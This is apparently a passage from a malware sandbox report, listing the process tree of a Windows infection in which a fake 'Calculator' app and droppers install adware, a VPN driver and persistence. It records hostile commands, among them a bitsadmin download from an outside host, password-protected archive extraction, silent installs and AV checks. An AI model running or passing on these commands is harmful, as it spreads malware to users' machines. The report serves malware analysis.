"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
12⤵
PID:6920

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=1724 /prefetch:8
12⤵
PID:1616

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=2348 /prefetch:8
12⤵
PID:6500

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2520 /prefetch:1
12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6224

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2512 /prefetch:1
12⤵
PID:2844

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1596 /prefetch:2
12⤵
- Modifies registry class
PID:1644

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=3296 /prefetch:8
12⤵
PID:8304

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=3716 /prefetch:8
12⤵
PID:9728

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=3772 /prefetch:8
12⤵
PID:10120

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=2136 /prefetch:8
12⤵
PID:5556

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,4397911288218088706,10832720632261651511,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8576_1299416353" --mojo-platform-channel-handle=844 /prefetch:8
12⤵
PID:4352

C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe
"C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"
9⤵
PID:1996

C:\Users\Admin\AppData\Local\Temp\is-D482O.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D482O.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp" /SL5="$40324,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"
10⤵
- Loads dropped DLL
PID:1176

C:\Users\Admin\AppData\Local\Temp\is-E2CJD.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-E2CJD.tmp\DYbALA.exe" /S /UID=2709
11⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:3220

C:\Program Files\Windows Defender\YUILRNYATQ\foldershare.exe
"C:\Program Files\Windows Defender\YUILRNYATQ\foldershare.exe" /VERYSILENT
12⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2244

C:\Users\Admin\AppData\Local\Temp\d2-dda65-ae9-14085-58da38533875d\Vujazhaxami.exe
"C:\Users\Admin\AppData\Local\Temp\d2-dda65-ae9-14085-58da38533875d\Vujazhaxami.exe"
12⤵
PID:2468

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s2xouf2j.ojo\GcleanerEU.exe /eufive & exit
13⤵
PID:1420

C:\Users\Admin\AppData\Local\Temp\s2xouf2j.ojo\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\s2xouf2j.ojo\GcleanerEU.exe /eufive
14⤵
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 236
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\utkhvpur.jva\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:5272

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
14⤵
PID:5980

C:\Users\Admin\AppData\Local\Temp\utkhvpur.jva\installer.exe
C:\Users\Admin\AppData\Local\Temp\utkhvpur.jva\installer.exe /qn CAMPAIGN="654"
14⤵
PID:7160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe & exit
13⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe
C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe
14⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5608

C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe
"C:\Users\Admin\AppData\Local\Temp\ejou4nwg.npq\any.exe" -u
15⤵
PID:8176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwbkrj1u.uz4\gcleaner.exe /mixfive & exit
13⤵
PID:7708

C:\Users\Admin\AppData\Local\Temp\pwbkrj1u.uz4\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\pwbkrj1u.uz4\gcleaner.exe /mixfive
14⤵
PID:8384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8384 -s 240
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y123vafs.uuo\autosubplayer.exe /S & exit
13⤵
PID:9608

C:\Users\Admin\AppData\Local\Temp\y123vafs.uuo\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\y123vafs.uuo\autosubplayer.exe /S
14⤵
- Drops file in Program Files directory
PID:5492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:7616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:9908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:5460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:8600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:9660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:7024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
- Checks for any installed AV software in registry
PID:4560

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
- Loads dropped DLL
PID:6600

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
15⤵
- Download via BitsAdmin
PID:6432

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
- Drops file in Program Files directory
PID:7456

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
PID:7964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:4184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:9024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:9320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:9312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:5376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq8BBA.tmp\tempfile.ps1"
15⤵
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 1764
15⤵
- Program crash
- Checks processor information in registry
PID:6628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
13⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe
C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe SID=778 CID=778 SILENT=1 /quiet
14⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5980

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\y51zqrhq.jzc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635569260 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
15⤵
PID:1692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgqzr0is.4l3\GcleanerEU.exe /eufive & exit
13⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\mgqzr0is.4l3\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\mgqzr0is.4l3\GcleanerEU.exe /eufive
14⤵
PID:6456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 236
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe /silent /subid=798 & exit
13⤵
PID:792

C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe
C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe /silent /subid=798
14⤵
PID:3520

C:\Users\Admin\AppData\Local\Temp\is-3GS6G.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3GS6G.tmp\vpn.tmp" /SL5="$90216,15170975,270336,C:\Users\Admin\AppData\Local\Temp\gysyo1o0.j24\vpn.exe" /silent /subid=798
15⤵
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
16⤵
PID:6240

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
17⤵
- Checks SCSI registry key(s)
PID:2152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
16⤵
PID:9288

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
17⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3008

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5456

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7440

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:8776

C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe
C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe /qn CAMPAIGN="654"
14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7244

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b0tqwjmi.uqe\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635569260 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
15⤵
PID:6724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe & exit
13⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe
C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe
14⤵
PID:3292

C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe
"C:\Users\Admin\AppData\Local\Temp\ksojpbmh.szr\any.exe" -u
15⤵
PID:8592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkswhowl.v4u\customer51.exe & exit
13⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\rkswhowl.v4u\customer51.exe
C:\Users\Admin\AppData\Local\Temp\rkswhowl.v4u\customer51.exe
14⤵
PID:7796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\suzbx0ad.qvm\gcleaner.exe /mixfive & exit
13⤵
PID:6464

C:\Users\Admin\AppData\Local\Temp\suzbx0ad.qvm\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\suzbx0ad.qvm\gcleaner.exe /mixfive
14⤵
PID:9096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9096 -s 240
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52slppkb.juj\autosubplayer.exe /S & exit
13⤵
- Suspicious use of SetWindowsHookEx
PID:7160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb0yvhob.rqw\installer.exe /qn CAMPAIGN=654 & exit
13⤵
PID:9524

C:\Users\Admin\AppData\Local\Temp\nb0yvhob.rqw\installer.exe
C:\Users\Admin\AppData\Local\Temp\nb0yvhob.rqw\installer.exe /qn CAMPAIGN=654
14⤵
PID:1032

C:\Users\Admin\AppData\Local\Temp\82-7f6b6-7e4-60f91-0adff13e05a68\Hatenitoli.exe
"C:\Users\Admin\AppData\Local\Temp\82-7f6b6-7e4-60f91-0adff13e05a68\Hatenitoli.exe"
12⤵
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f74718
14⤵
PID:3684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
14⤵
PID:7692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
14⤵
PID:7748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
14⤵
PID:7740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
14⤵
PID:8108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
14⤵
PID:8512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
14⤵
PID:8608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
14⤵
PID:8672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
14⤵
PID:9796

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:8
14⤵
PID:5664

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:8
14⤵
PID:4564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 /prefetch:2
14⤵
PID:9952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
14⤵
PID:9704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
14⤵
PID:8336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
